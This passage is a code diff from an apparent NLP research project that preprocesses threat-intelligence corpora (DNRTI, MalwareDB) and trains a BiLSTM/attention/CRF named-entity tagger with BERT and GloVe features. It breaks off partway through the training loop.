+ with open('Result/Data/MalwareDB/test_id_dict.pickle', 'wb') as file:
120
+ pickle.dump(test_id_dict, file) # can be used for others
121
+
122
+ # pad the_word_id, label_id, pos_id, and case_id of train_sentence
123
+ train_word_sentence_padding = sentence_padding(train_text2ids[0], sent_maxlen, build_vocab_result[0]['[PAD]'])
124
+ # train_word_sentence_padding = torch.tensor(train_word_sentence_padding, dtype=torch.long)
125
+ train_label_sentence_padding = sentence_padding(train_text2ids[2], sent_maxlen, build_vocab_result[4]['[X]'])
126
+ train_pos_sentence_padding = sentence_padding(train_text2ids[3], sent_maxlen, build_vocab_result[6]['[PPAD]'])
127
+ train_case_sentence_padding = sentence_padding(train_text2ids[4], sent_maxlen, case2idx['[PAD]'])
128
+ # pad the char_id_sentence
129
+ train_char_sentences_padding = char_sentences_padding(train_text2ids[1], sent_maxlen, word_maxlen)
130
+ # train_char_sentences_padding = torch.tensor(train_char_sentences_padding, dtype=torch.long)
131
+
132
+ train_id_pad_dict = dict(train_wordids_pad=train_word_sentence_padding,
133
+ train_charids_pad=train_char_sentences_padding,
134
+ train_labelids_pad=train_label_sentence_padding,
135
+ train_posids_pad=train_pos_sentence_padding,
136
+ train_caseids_pad=train_case_sentence_padding
137
+ )
138
+
139
+ with open('Result/Data/MalwareDB/train_id_pad_dict.pickle', 'wb') as file:
140
+ pickle.dump(train_id_pad_dict, file) # can be used for train and pos_emb
141
+
142
+ # pad the_word_id, label_id, pos_id, and case_id of valid_sentence
143
+ valid_word_sentence_padding = sentence_padding(valid_text2ids[0], sent_maxlen, build_vocab_result[0]['[PAD]'])
144
+ # valid_word_sentence_padding = torch.tensor(valid_word_sentence_padding, dtype=torch.long)
145
+ valid_label_sentence_padding = sentence_padding(valid_text2ids[2], sent_maxlen, build_vocab_result[4]['[X]'])
146
+ valid_pos_sentence_padding = sentence_padding(valid_text2ids[3], sent_maxlen, build_vocab_result[6]['[PPAD]'])
147
+ valid_case_sentence_padding = sentence_padding(valid_text2ids[4], sent_maxlen, case2idx['[PAD]'])
148
+ # pad the char_id_sentence
149
+ valid_char_sentences_padding = char_sentences_padding(valid_text2ids[1], sent_maxlen, word_maxlen)
150
+ # valid_char_sentences_padding = torch.tensor(valid_char_sentences_padding, dtype=torch.long)
151
+
152
+ valid_id_pad_dict = dict(valid_wordids_pad=valid_word_sentence_padding,
153
+ valid_charids_pad=valid_char_sentences_padding,
154
+ valid_labelids_pad=valid_label_sentence_padding,
155
+ valid_posids_pad=valid_pos_sentence_padding,
156
+ valid_caseids_pad=valid_case_sentence_padding
157
+ )
158
+
159
+ with open('Result/Data/MalwareDB/valid_id_pad_dict.pickle', 'wb') as file:
160
+ pickle.dump(valid_id_pad_dict, file) # can be used for validation and pos_emb
161
+
162
+ # pad the_word_id, label_id, pos_id, and case_id of test_sentence
163
+ test_word_sentence_padding = sentence_padding(test_text2ids[0], sent_maxlen, build_vocab_result[0]['[PAD]'])
164
+ # test_word_sentence_padding = torch.tensor(test_word_sentence_padding, dtype=torch.long)
165
+ test_label_sentence_padding = sentence_padding(test_text2ids[2], sent_maxlen, build_vocab_result[4]['[X]'])
166
+ test_pos_sentence_padding = sentence_padding(test_text2ids[3], sent_maxlen, build_vocab_result[6]['[PPAD]'])
167
+ test_case_sentence_padding = sentence_padding(test_text2ids[4], sent_maxlen, case2idx['[PAD]'])
168
+ # pad the char_id_sentence
169
+ test_char_sentences_padding = char_sentences_padding(test_text2ids[1], sent_maxlen, word_maxlen)
170
+ # test_char_sentences_padding = torch.tensor(test_char_sentences_padding, dtype=torch.long)
171
+
172
+ test_id_pad_dict = dict(test_wordids_pad=test_word_sentence_padding,
173
+ test_charids_pad=test_char_sentences_padding,
174
+ test_labelids_pad=test_label_sentence_padding,
175
+ test_posids_pad=test_pos_sentence_padding,
176
+ test_caseids_pad=test_case_sentence_padding
177
+ )
178
+
179
+ with open('Result/Data/MalwareDB/test_id_pad_dict.pickle', 'wb') as file:
180
+ pickle.dump(test_id_pad_dict, file) # can be used for test and pos_emb
181
+
182
+ # get all the feature_tables
183
+ np.save('Result/Embedding/MalwareDB/case_embedding.npy', case_emb)
184
+ # case_emb_table = torch.tensor(case_emb, dtype=torch.float32)
185
+ # pos_emb_table = torch.tensor(build_pos_emb_table(), dtype=torch.float32)
186
+ np.save('Result/Embedding/MalwareDB/char_embedding.npy', build_char_emb_table(build_vocab_result[3]))
187
+ # char_emb_table = torch.tensor(build_char_emb_table(build_vocab_result[3]), dtype=torch.float32)
188
+
189
+ glove = GloveFeature('Result/Embedding/glove.6B.50d.txt') # 该地址后续可能会变
190
+ glove_embedding_dict = glove.load_glove_embedding()
191
+ word_emb_table = build_word_emb_table(build_vocab_result[1], glove_embedding_dict, glove.glove_dim)
192
+ np.save('Result/Embedding/MalwareDB/word_embedding.npy', word_emb_table)
193
+ # word_emb_table = torch.tensor(word_emb_table, dtype=torch.float32)
data/raw/DNRTI/data_utils.py ADDED
@@ -0,0 +1,424 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/8/13 下午5:21
4
+ # @Author : PeiP Liu
5
+ # @FileName: data_utils.py
6
+ # @Software: PyCharm
7
+
8
+ import os
9
+ from collections import Counter
10
+ import numpy as np
11
+ from numpy import random
12
+ import stanza
13
+ # import nltk
14
+ # rf https://stanfordnlp.github.io/stanza/pos.html
15
+
16
+
17
def processing_orgdata(mode):
    """
    Read a CoNLL-style file (one ``word tag`` pair per line, sentences separated
    by an empty line) and rebuild the sentences together with their POS tags.

    :param mode: 'train' reads train.txt, 'valid' reads valid.txt, any other value reads test.txt
    :return: tuple ``(sentences, sentences_labels, sentences_pos, str_sentences,
             sent_maxlen, word_maxlen, num_sentence)``
    """
    data_dir = 'MalwareDB/MalwareDB/'
    file_names = {'train': 'train.txt', 'valid': 'valid.txt'}
    file_path = os.path.join(data_dir, file_names.get(mode, 'test.txt'))

    # The corpus is already tokenized, so stanza must not re-tokenize it:
    # otherwise the number of POS tags can differ from the number of tokens.
    nlp = stanza.Pipeline('en', processors='tokenize,pos', tokenize_pretokenized=True)

    sentences = []
    sentences_labels = []
    sentences_pos = []
    str_sentences = []

    sentence = []
    sentence_label = []

    def close_sentence():
        """Store the sentence collected so far (if any) and reset the buffers."""
        if not sentence:
            return
        doc = nlp([sentence])  # one pre-tokenized sentence
        sentences_pos.append([word.pos for sent in doc.sentences for word in sent.words])

        assert len(sentence_label) == len(sentence)
        sentences.append(list(sentence))
        sentences_labels.append(list(sentence_label))
        # keep the historical format: every token is preceded by one space
        str_sentences.append(''.join(' ' + token for token in sentence))

        sentence.clear()
        sentence_label.clear()

    # the context manager guarantees the file is closed, even on errors
    with open(file_path, 'r') as file_read:
        for line in file_read:
            line = line.strip()
            if line == '':
                close_sentence()
                continue
            word_label = line.split()
            if len(word_label) != 2:
                continue  # skip malformed lines
            sentence.append(word_label[0])  # token of the original sentence
            sentence_label.append(word_label[1])  # label of that token

    # the file may not end with an empty line; do not lose the last sentence
    close_sentence()

    sent_maxlen = max((len(sent) for sent in sentences), default=0)
    word_maxlen = max((len(word) for sent in sentences for word in sent), default=0)

    num_sentence = len(sentences)
    print("The mode is : {}".format(mode))
    print("sent max length is {}".format(sent_maxlen))
    print("word max length is %d" % word_maxlen)
    print('num of sentences is ', num_sentence)
    return sentences, sentences_labels, sentences_pos, str_sentences, sent_maxlen, word_maxlen, num_sentence
89
+
90
+
91
def build_vocab(sentences, sentences_labels, sentences_pos):
    """
    Build the word / char / label / POS vocabularies.

    The inputs are expected to cover train + valid + test together.

    :param sentences: list of token lists
    :param sentences_labels: list of label lists, parallel to ``sentences``
    :param sentences_pos: list of POS-tag lists, parallel to ``sentences``
    :return: ``(word2index, index2word, char2index, index2char,
             label2index, index2label, pos2index, index2pos)``
    """
    word_counter = Counter()
    char_counter = Counter()
    label_counter = Counter()
    pos_tags = set()
    for i_sent, sent in enumerate(sentences):
        for j_word, word in enumerate(sent):
            word_counter[word.strip()] += 1  # all the words in dict can also be lower
            label_counter[sentences_labels[i_sent][j_word]] += 1
            pos_tags.add(sentences_pos[i_sent][j_word])
            char_counter.update(word)

    # words seen fewer than twice are left out and later map to [UNK]
    word_set = [word for word, count in word_counter.most_common() if count >= 2]
    print("The word set is ", word_set)
    word2index = {each_word: word_index + 2 for word_index, each_word in enumerate(word_set)}
    word2index['[PAD]'] = 0
    word2index['[UNK]'] = 1
    index2word = {word_index: each_word for each_word, word_index in word2index.items()}

    # chars seen fewer than twice are left out and later map to [CUNK]
    char_set = [char for char, count in char_counter.most_common() if count >= 2]
    print("The char set is ", char_set)
    char2index = {each_char: char_index + 2 for char_index, each_char in enumerate(char_set)}
    char2index['[CPAD]'] = 0
    char2index['[CUNK]'] = 1
    index2char = {char_index: each_char for each_char, char_index in char2index.items()}

    label_set = [label for label, _ in label_counter.most_common()]
    print("The label set is ", label_set)
    label2index = {each_label: label_index + 3 for label_index, each_label in enumerate(label_set)}
    label2index['[BOS]'] = 0
    label2index['[EOS]'] = 1
    label2index['[X]'] = 2
    index2label = {label_index: each_label for each_label, label_index in label2index.items()}

    # sorted() makes the POS ids reproducible; plain set order changes between runs
    pos_set = sorted(pos_tags)
    print('The pos set is ', pos_set)
    pos2index = {pos: pos_index + 1 for pos_index, pos in enumerate(pos_set)}
    pos2index['[PPAD]'] = 0
    index2pos = {pos_index: pos for pos, pos_index in pos2index.items()}
    return word2index, index2word, char2index, index2char, label2index, index2label, pos2index, index2pos
133
+
134
+
135
def case_feature():
    """
    Return the casing vocabulary and its one-hot embedding table.

    :return: ``(case2idx, case_emb)`` where ``case_emb`` is a float32 identity
             matrix with one row per casing class
    """
    case_names = ('allNum', 'allLower', 'allUpper', 'upperInit', 'other', 'main_num', 'contain_num', '[PAD]')
    case2idx = {name: position for position, name in enumerate(case_names)}
    case_emb = np.eye(len(case2idx), dtype='float32')
    return case2idx, case_emb
139
+
140
+
141
def get_token_case(token, case2idx):
    """
    Map a token to the id of its casing (character morphology) class.

    The token is stripped once and the stripped form is used for every check,
    so stray surrounding whitespace cannot skew the result. An empty token is
    reported as 'other' instead of raising ZeroDivisionError.

    :param token: the word to classify
    :param case2idx: mapping from casing-class name to id (see ``case_feature``)
    :return: the id of the casing class
    """
    token = token.strip()
    if not token:
        return case2idx['other']

    num_digits = sum(1 for char in token if char.isdigit())
    digit_prop = num_digits / float(len(token))

    # the order of the checks matters: the first matching class wins
    if token.isdigit():
        casing = 'allNum'
    elif digit_prop > 0.5:
        casing = 'main_num'
    elif token.islower():
        casing = 'allLower'
    elif token.isupper():
        casing = 'allUpper'
    elif token.istitle():
        casing = 'upperInit'
    elif num_digits > 0:
        casing = 'contain_num'
    else:
        casing = 'other'

    return case2idx[casing]
163
+
164
+
165
def text2ids(sentences, sentences_labels, sentences_pos, word2index, char2index, label2index, pos2index, case2idx):
    """
    Convert the sentences of one split (train, valid or test) to id sequences.

    :param sentences: list of token lists
    :param sentences_labels: list of label lists, parallel to ``sentences``
    :param sentences_pos: list of POS-tag lists, parallel to ``sentences``
    :param word2index: word vocabulary, must contain '[UNK]'
    :param char2index: char vocabulary, must contain '[CUNK]'
    :param label2index: label vocabulary
    :param pos2index: POS vocabulary
    :param case2idx: casing vocabulary
    :return: ``(sents_wordids, sents_charids, sents_labels_ids, sents_posids, sents_caseids)``
    """
    def lookup_word(token):
        # exact form first, then the lower-cased form, finally [UNK]
        if token in word2index:
            return word2index[token]
        lowered = token.lower()
        if lowered in word2index:
            return word2index[lowered]
        return word2index['[UNK]']  # the low frequency words and OOV

    def lookup_chars(token):
        # low frequency and unseen chars map to [CUNK]
        return [char2index[ch] if ch in char2index else char2index['[CUNK]'] for ch in token]

    sents_wordids, sents_charids, sents_labels_ids, sents_posids, sents_caseids = [], [], [], [], []

    for sent_iter, sent in enumerate(sentences):
        gold_labels = sentences_labels[sent_iter] if sent else None
        gold_pos = sentences_pos[sent_iter] if sent else None

        word_ids, char_ids, label_ids, pos_ids, case_ids = [], [], [], [], []
        for word_iter, token in enumerate(sent):
            word_ids.append(lookup_word(token))
            char_ids.append(lookup_chars(token))
            label_ids.append(label2index[gold_labels[word_iter]])
            pos_ids.append(pos2index[gold_pos[word_iter]])
            case_ids.append(get_token_case(token, case2idx))

        sents_wordids.append(word_ids)
        sents_charids.append(char_ids)
        sents_labels_ids.append(label_ids)
        sents_posids.append(pos_ids)
        sents_caseids.append(case_ids)

    return sents_wordids, sents_charids, sents_labels_ids, sents_posids, sents_caseids
206
+
207
+
208
def sentence_padding(sentences, sent_maxlen, padding_value):
    """
    Bring every id sequence to exactly ``sent_maxlen`` items.

    The sentences are already converted to ids. Short sequences are padded at
    the end with ``padding_value``, long ones are cut.

    :param sentences: list of id lists
    :param sent_maxlen: target length
    :param padding_value: id used for padding
    :return: list of id lists, each of length ``sent_maxlen``
    """
    def fit(sent):
        missing = sent_maxlen - len(sent)
        if missing > 0:
            return sent + [padding_value] * missing
        return sent[:sent_maxlen]

    return [fit(sent) for sent in sentences]
220
+ # return np.array(padded), actual_len
221
+
222
+
223
def char_sentences_padding(sents_charids, sent_maxlen, word_maxlen):
    """
    Pad the char ids of every sentence to a ``[sent_maxlen, word_maxlen]`` matrix.

    The padding value is 0, i.e. ``char2index['[CPAD]']``. Words longer than
    ``word_maxlen`` and sentences longer than ``sent_maxlen`` are truncated
    (the latter mirrors ``sentence_padding`` and avoids an IndexError).

    :param sents_charids: list of sentences, each a list of per-word char-id lists
    :param sent_maxlen: number of rows (words) of every output matrix
    :param word_maxlen: number of columns (chars) of every output matrix
    :return: list of int32 arrays of shape ``[sent_maxlen, word_maxlen]``
    """
    pad_char_sentences = []
    for sent in sents_charids:
        sent_char_pad = np.zeros([sent_maxlen, word_maxlen], dtype=np.int32)  # one sentence
        for row, word in enumerate(sent[:sent_maxlen]):
            kept = word[:word_maxlen]
            if len(kept):
                sent_char_pad[row, :len(kept)] = kept  # post padding
        pad_char_sentences.append(sent_char_pad)  # the list of padded sentences

    return pad_char_sentences
245
+ # return np.array(pad_char_sentences) # numpy array
246
+
247
+
248
def build_word_emb_table(index2word, glove_embed_dict, word_embed_dim):
    """
    Build the word embedding table from pre-trained GloVe vectors.

    A word is looked up in its exact form first, then lower-cased; words
    missing from GloVe get a vector drawn uniformly from ``[-scale, scale]``
    with ``scale = sqrt(3 / word_embed_dim)``.

    :param index2word: mapping from word id to word
    :param glove_embed_dict: mapping from word to its GloVe vector
    :param word_embed_dim: dimension of the embeddings
    :return: float32 array of shape ``[len(index2word), word_embed_dim]``
    """
    bound = np.sqrt(3.0 / word_embed_dim)
    table = np.empty([len(index2word), word_embed_dim], dtype=np.float32)
    # random start values for the two special rows (UNK and PAD)
    table[:2, :] = np.random.uniform(-bound, bound, [2, word_embed_dim])
    for row, token in index2word.items():
        if token in glove_embed_dict:
            vector = glove_embed_dict[token]
        else:
            lowered = token.lower()
            if lowered in glove_embed_dict:
                vector = glove_embed_dict[lowered]
            else:
                vector = np.random.uniform(-bound, bound, [1, word_embed_dim])
        table[row, :] = vector
    return table
261
+
262
+
263
def build_char_emb_table(index2char, char_embed_dim=30):
    """
    Create a randomly initialised char embedding table.

    :param index2char: char vocabulary; only its size is used
    :param char_embed_dim: dimension of the char embeddings
    :return: float32 array of shape ``[len(index2char), char_embed_dim]`` with
             values drawn uniformly from ``[-sqrt(3/dim), sqrt(3/dim)]``
    """
    bound = np.sqrt(3.0 / char_embed_dim)
    shape = [len(index2char), char_embed_dim]
    return np.random.uniform(-bound, bound, shape).astype(np.float32)
267
+
268
+
269
def build_pos_emb_table():
    """
    Load the POS embedding table stored under ``Result/PosEmbedding/MalwareDB``.

    :return: the array read from ``pos_embedding.npy``
    """
    return np.load('Result/PosEmbedding/MalwareDB/pos_embedding.npy')
272
+
273
+ '''
274
+ def split_wordlabelpos(input_sentences):# [[['This', 'B-PER', 'NN'], ...],...]
275
+ sent_word = [[word[0] for word in sent] for sent in input_sentences] # [['this','is','a','test'],...]
276
+ sent_label = [[word[1] for word in sent] for sent in input_sentences] # it is like the former, but only by 'B-PER'
277
+ sent_pos = [[word[2] for word in sent] for sent in input_sentences]
278
+ return [sent_word, sent_label, sent_pos]
279
+
280
+ def word2charlist(char2index, index2word): ######## 后面要注意填充词和未登录词 ##########
281
+ word2charids = {}
282
+ for ind, word in index2word.items():
283
+ char_ids = []
284
+ for char in word:
285
+ if char in char2index.keys():
286
+ char_ids = char_ids + [char2index[char]]
287
+ else:
288
+ char_ids = char_ids + [char2index['[CUNK]']]
289
+ word2charids[ind] = char_ids
290
+ return word2charids # 返回值是{词索引:字符索引列表}的形式
291
+
292
+ def word_padding(word2charids, word_maxlen, padding_value): # 输入形式是{词索引:字符索引列表}
293
+ word_padded = dict()
294
+ word_actuallen = dict()
295
+ for word_idx, charids_list in word2charids.items():
296
+ charids_list_ = charids_list[:word_maxlen] + [padding_value] * max(word_maxlen-len(charids_list), 0)
297
+ word_padded[word_idx] = charids_list_
298
+ word_actuallen[word_idx] = min(len(charids_list), word_maxlen)
299
+ return word_padded, word_actuallen # 输出是{词索引:扩充后的字符索引列表},{词索引:实际包含的字符数量}
300
+
301
+ def get_batch(dataset, batch_size, shuffle=False):
302
+ data_size = len(dataset)
303
+ num_batch = int((data_size-1) / batch_size) + 1
304
+ if shuffle:
305
+ indices = np.random.permutation(np.arange(data_size))
306
+ data_shuffle = np.array(dataset)[indices]
307
+ else:
308
+ data_shuffle = np.array(dataset)
309
+
310
+ for i_batch in num_batch:
311
+ start_id = i_batch * batch_size
312
+ end_id = min((i_batch + 1) * batch_size, data_size)
313
+ yield data_shuffle[start_id:end_id]
314
+ '''
315
+
316
+
317
def gen_batch_data(sents, labels, bert_sents, bert_labels, num_sentence, batch_size):
    """
    Yield shuffled mini-batches of the padded features and the BERT inputs.

    :param sents: sequence ``(wordids_pad, charids_pad, posids_pad, caseids_pad)``
    :param labels: padded label ids, parallel to the features
    :param bert_sents: sentences for the BERT branch, parallel to the features
    :param bert_labels: labels for the BERT branch, parallel to the features
    :param num_sentence: number of samples to draw from
    :param batch_size: number of samples per batch (the last batch may be smaller)
    :return: generator of ``((words, chars, pos, case), labels, bert_sents, bert_labels)``
    """
    word_arr, char_arr, pos_arr, case_arr = [np.array(sents[k]) for k in range(4)]
    label_arr = np.array(labels)
    bert_sent_arr = np.array(bert_sents)
    bert_label_arr = np.array(bert_labels)

    order = np.arange(num_sentence)
    random.shuffle(order)

    def take(rows):
        # the same row selection is applied to every parallel array
        features = (word_arr[rows], char_arr[rows], pos_arr[rows], case_arr[rows])
        return features, label_arr[rows], bert_sent_arr[rows], bert_label_arr[rows]

    start = 0
    # full batches first ...
    while start + batch_size < num_sentence:
        yield take(order[start: start + batch_size])
        start = start + batch_size
    # ... then whatever is left as the final batch
    yield take(order[start:])
360
+
361
+
362
class DataLoader:
    """Minimal batch iterator over two parallel, index-array addressable containers."""

    def __init__(self, input_data, labels):
        """
        :param input_data: samples; indexed with an integer index array in ``get_batch``
        :param labels: labels, parallel to ``input_data``
        """
        self.input_data = input_data
        self.labels = labels
        self.num_data = len(input_data)
        self.indexes = np.arange(self.num_data)

    def get_batch(self, batch_size, shuffle = True):
        """
        Yield ``(input_batch, label_batch)`` pairs covering the data once.

        :param batch_size: number of samples per batch (the last batch may be smaller)
        :param shuffle: shuffle the stored index order in place before iterating
        """
        if shuffle:
            np.random.shuffle(self.indexes)

        start = 0
        # full batches first ...
        while start + batch_size < self.num_data:
            picked = self.indexes[start:start + batch_size]
            yield self.input_data[picked], self.labels[picked]
            start = start + batch_size
        # ... then the remainder as the final batch
        tail = self.indexes[start:]
        yield self.input_data[tail], self.labels[tail]

    def __len__(self):
        """Return the number of samples."""
        return self.num_data
384
+
385
+
386
class GloveFeature:
    """Reader for a GloVe text file (one token followed by its vector per line)."""

    def __init__(self, glove_path):
        """
        :param glove_path: path of the GloVe text file; it is scanned once here
                           to collect the vocabulary and the vector dimension
        """
        self.glove_path = glove_path
        self.glove_token2inx, self.glove_dim = self.glove_vocab()

    def _iter_rows(self):
        """Yield the space-separated fields of every non-empty line of the file."""
        # GloVe files are UTF-8; the context manager closes the file reliably
        with open(self.glove_path, 'r', encoding='utf-8') as file_read:
            for line in file_read:
                line = line.strip()
                if len(line) == 0:
                    continue
                yield line.split(' ')

    def glove_vocab(self):
        """
        Collect the GloVe vocabulary.

        :return: ``(glove_token2inx, embed_dim)``; tokens are numbered in file
                 order, ``embed_dim`` is -1 for an empty file
        """
        glove_token2inx = {}
        embed_dim = -1
        for tokens in self._iter_rows():
            if embed_dim < 0:
                embed_dim = len(tokens) - 1
            else:
                # every line must carry a vector of the same dimension
                assert (embed_dim + 1 == len(tokens))
            # file order gives reproducible ids; a repeated token keeps its first id
            glove_token2inx.setdefault(tokens[0], len(glove_token2inx))
        print('glove vocab done. {} tokens'.format(len(glove_token2inx)))
        return glove_token2inx, embed_dim

    def load_glove_embedding(self):
        """
        Load all GloVe vectors.

        :return: dict mapping every token to its vector (1-D float array)
        """
        embedding_dict = dict()
        for tokens in self._iter_rows():
            embedding_dict[tokens[0]] = np.array([float(x) for x in tokens[1:]])

        return embedding_dict
424
+
data/raw/DNRTI/main.py ADDED
@@ -0,0 +1,276 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/9/11 下午4:28
4
+ # @Author : PeiP Liu
5
+ # @FileName: main.py
6
+ # @Software: PyCharm
7
+
8
+ import os
9
+ import torch
10
+ import pickle
11
+ import torch.nn as nn
12
+ import numpy as np
13
+ import time
14
+ import seaborn as sns
15
+ import matplotlib.pyplot as plt
16
+ from tqdm import trange
17
+ import torch.optim as optim
18
+ from torch.utils.tensorboard import SummaryWriter
19
+ from arguments import BilstmCnnArgs as args
20
+ from arguments import BertArgs as bert_args
21
+ from BiLSTM_CNN.model import build_model
22
+ from data_utils import gen_batch_data
23
+ from Finetuning_BertCRF.Bert_Feature import GetBertFeature
24
+ from common_modules.model_evaluation import lc_cal_f1, lc_cal_acc
25
+ from common_modules.utils import EarlyStopping
26
+ from Finetuning_BertCRF.BertModel import BERT_CRF_NER
27
+
28
+ os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
29
+ os.environ['CUDA_VISIBLE_DEVICES'] = '1'
30
+
31
if __name__ == "__main__":
    # Train the BiLSTM / multi-head attention / CRF tagger with additional BERT
    # features, keep the checkpoint with the best validation F1, evaluate that
    # checkpoint on the test split and finally plot the learning curves.
    os.makedirs(args.output_dir, exist_ok=True)
    checkpoint_path = os.path.join(args.output_dir, 'BiLSTM_CNN_MultiHead_all.checkpoint.pt')

    train_sents = (args.train_wordids_pad, args.train_charids_pad, args.train_posids_pad, args.train_caseids_pad)
    train_labels = args.train_labelids_pad

    valid_sents = (args.valid_wordids_pad, args.valid_charids_pad, args.valid_posids_pad, args.valid_caseids_pad)
    valid_labels = args.valid_labelids_pad

    test_sents = (args.test_wordids_pad, args.test_charids_pad, args.test_posids_pad, args.test_caseids_pad)
    test_labels = args.test_labelids_pad

    bert_train_sents = bert_args.train_seq_list
    bert_train_labels = bert_args.train_seq_label_list

    bert_valid_sents = bert_args.valid_seq_list
    bert_valid_labels = bert_args.valid_seq_label_list

    bert_test_sents = bert_args.test_seq_list
    bert_test_labels = bert_args.test_seq_label_list

    word2indx = args.word2idx
    label2idx = args.label2idx

    writer = SummaryWriter(log_dir=args.output_dir, comment='scalar_record')
    early_stop = EarlyStopping(monitor='valid-f1', min_delta=args.min_delta, patience=args.patience)

    # Author's notes on the alternatives that were tried:
    # model = build_model('multi_feature_bilstm_atten_crf', args).to(args.device)  # does not work
    # model = build_model('transformer_crf', args).to(args.device)  # works
    model = build_model('bilstm_multihead_atten_crf', args).to(args.device)  # works
    # model = build_model('bilstm_atten_crf', args).to(args.device)  # slightly effective
    bert_emission = GetBertFeature(args.device)

    optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
    # rf https://pytorch.org/docs/stable/generated/torch.optim.lr_scheduler.ReduceLROnPlateau.html
    lr_decay = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=args.lr_decay_factor,
                                                    verbose=True, patience=3, min_lr=args.min_lr)

    def to_long_tensor(array):
        """Move a numpy id array to the configured device as a LongTensor."""
        return torch.from_numpy(array).long().to(args.device)

    def evaluate(sents, labels, bert_sents, bert_labels, num_sentence, with_loss):
        """
        Run the model over one split without tracking gradients.

        :return: ``(true_tags, pred_tags, avg_loss)``; ``avg_loss`` is None
                 when ``with_loss`` is False
        """
        true_tags, pred_tags = [], []
        acml_loss = 0
        model.eval()
        with torch.no_grad():  # no graph is needed for evaluation
            for batch_sents, batch_labels, batch_bert_sents, batch_bert_labels in \
                    gen_batch_data(sents, labels, bert_sents, bert_labels, num_sentence, args.batch_size):
                # move the data to the device (GPU)
                word_ids = to_long_tensor(batch_sents[0])
                char_ids = to_long_tensor(batch_sents[1])
                pos_ids = to_long_tensor(batch_sents[2])
                case_ids = to_long_tensor(batch_sents[3])
                label_ids = to_long_tensor(batch_labels)

                # bert feature
                bert_sent_list = batch_bert_sents.tolist()
                bert_label_list = batch_bert_labels.tolist()
                bert_feature = bert_emission.get_bert_feature(bert_sent_list, bert_label_list, args.device)

                if with_loss:
                    # the 'train' forward mode returns the loss of the batch
                    batch_loss = model(char_ids, word_ids, pos_ids, case_ids, label_ids, 'train', bert_feature)
                    acml_loss = acml_loss + batch_loss.detach().cpu().item() * len(bert_sent_list)

                # the 'test' forward mode returns the predicted tag sequences
                batch_preds = model(char_ids, word_ids, pos_ids, case_ids, label_ids, 'test', bert_feature)

                labels_flatten = [each_label for each_sent in batch_labels for each_label in each_sent
                                  if each_label != args.label_pad_indx]
                preds_flatten = [each_pred_label for each_pre_sent in batch_preds for each_pred_label in each_pre_sent]

                print(labels_flatten)
                print(preds_flatten)

                true_tags.extend(labels_flatten)  # array is also well
                pred_tags.extend(preds_flatten)

        avg_loss = acml_loss / num_sentence if with_loss else None
        return true_tags, pred_tags, avg_loss

    print("*****************************Starting Training*****************************")
    num_batch = args.num_train // args.batch_size if args.num_train % args.batch_size == 0 else args.num_train // args.batch_size + 1
    # start below any possible F1 so that the first epoch always writes a
    # checkpoint; otherwise a run whose F1 stays at 0 has nothing to load later
    valid_f1_prev = -1.0

    # record the training infor
    train_ave_loss = []
    valid_acc_score = []
    valid_f1_score = []
    valid_loss_score = []

    for epoch in trange(args.total_train_epoch, desc='Epoch'):
        train_loss = 0

        # compute the training time, and initiate the time
        train_start = time.time()
        batch_start = time.time()

        # setting the training mode and clear the grad
        model.train()
        model.zero_grad()
        for i_batch, (batch_train_sents, batch_train_labels, batch_bert_train_sents, batch_bert_train_labels) in \
                enumerate(gen_batch_data(train_sents, train_labels, bert_train_sents, bert_train_labels,
                                         args.num_train, args.batch_size)):

            # move the data to the device (GPU)
            i_batch_train_word_sentences = to_long_tensor(batch_train_sents[0])
